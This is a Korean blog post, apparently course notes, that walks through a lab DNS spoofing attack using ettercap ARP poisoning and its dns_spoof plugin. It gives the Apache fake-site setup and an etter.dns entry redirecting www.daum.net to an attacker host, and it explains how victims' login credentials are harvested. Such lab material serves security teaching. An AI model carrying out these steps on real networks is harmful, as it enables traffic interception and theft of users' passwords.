- DNS Spoofing 을 하기 위한 기능
ARP spoofing + IP forwarding
Fake WEB
Fake DNS ( DNS Spoofing )
- 동작 원리
클라이언트가 DNS 서버에게 요청할때 Hacker가 먼저 응답을 해서 그 Domain의 IP가 Hacker의 IP 라고 알려준다.
그럼 클라이언트가 그 도메인을 쳐면 Hacker가 준비한 Fake WEB을 보게되지만 Hacker는 정상정인 도메인 사이트와 똑같이 만들어 놓기 때문에 클라이언트는 알아채지 못하고 ID와 Password를 치면 Hacker에게 정보가 넘어가게된다.
> 로그인이 되진 않겠지만 그러한 정보를 획득하면 정상적인 사이트로 연결시켜준다. 클라이언트는 ID나 Password를 잘못 입력한것으로만 알고 다시 로그인해 정상적으로 사용이 가능하기 때문에 알아차리기 어렵다.
- 실습
( kali )
ARP spoofing + IP forwarding -> ettercap 툴을 이용
Fake WEB
Fake DNS ( DNS Spoofing )
Fake WEB
[참고] Debian Web 서버 설정 CentOS
/etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf
/var/www/html/index.html /var/www/html/index.html
# service apache2 restart # service httpd restart
# update-rc.d apache2 enable # chkconfig httpd on
# cd /etc/apache2
# ls
|
apache2.conf conf-enabled magic mods-enabled sites-available conf-available envvars mods-available ports.conf sites-enabled |
|
/* kali 1.X : /var/www 2.X : /var/www/html */
# cd /var/www/html
# ls
|
index.html |
|
# echo " Fake Web Site" > /var/www/html/index.html
# service apache2 restart
# pgrep -lf apache ( # service apache2 status )
# firefox http://192.168.27.50 & /* 확인 */
DNS spoof
# cd /etc/ettercap
# ls
|
etter.conf etter.dns etter.mdns etter.nbns |
|
# vi etter.dns
|
############################################### # one day we will have our ettercap.org domain # www.ettercap.org A 127.0.0.1 www.ettercap-project.org A 127.0.0.1 ettercap.sourceforge.net A 23.235.43.133 www.ettercap.org PTR ::1 ############################################### # (1) Sfecific Configuration # - DNS Spoofing Test www.daum.net A 192.168.27.50 *.daum.net A 192.168.27.50 www.daum.net PTR 192.168.27.50 ############################################### # some MX examples # alor.org MX 127.0.0.1 naga.org MX 127.0.0.1 example.org MX 127.0.0.2 microsoft.com MX 2001:db8::1ce:c01d:bee3 |
|
> www.daum.net 으로 접속하면 kali 자신의 IP를 알려준다.
# ettercap -G &
> Unified sniffing
> Scan for hosts
> 내부 네트워크 이기 때문에 eth1 선택
> Host list 선택
> 200 ( linux200 ) Target 1 선택
> 201 ( win2008 ) Target 2 선택
> ARP Posisoning 선택
> Sniff remote connections
> ARP Spoofing 설정 완료
> Plugins > Manage the plugins 선택
> dns_spoof 더블 클릭하면 앞에 * 표시가 됩니다.
> Start > Start sniffing
> ARP spoofing 과 DNS spoofing 설정 완료
( win2008 )
웹 브라우저로 www.daum.net 접속
- 안되면
cmd > ipconfig /flushdns
캐싱된 dns를 초기화하고 다시 해보면 됩니다.
[ 참고 ]
> google사이트와 서울대학교 사이트 모두 www.daum.net 으로 설정된것을 확인할 수 있다.
> 클라이언트는 이렇게 잘 만들어진 Fack Site 들을 보고 가짜사이트인지 확인 할 수 없다.
> google 사이트는 아이디와 패스워드를 입력하면 Hacker 서버에 전송되고 실제 google 사이트로 돌아간다.
'Security > Network Security' 카테고리의 다른 글
| 단일 보안 솔루션 (0) | 2017.10.23 |
|---|---|
| DNS Spoofing 방어 대책 (0) | 2017.10.22 |
| Ettercap을 이용한 Packet Sniffing (0) | 2017.10.21 |
| Brutus Attack & Dictionary Attack (0) | 2017.10.21 |
| UDP Flooding Attack (0) | 2017.10.21 |
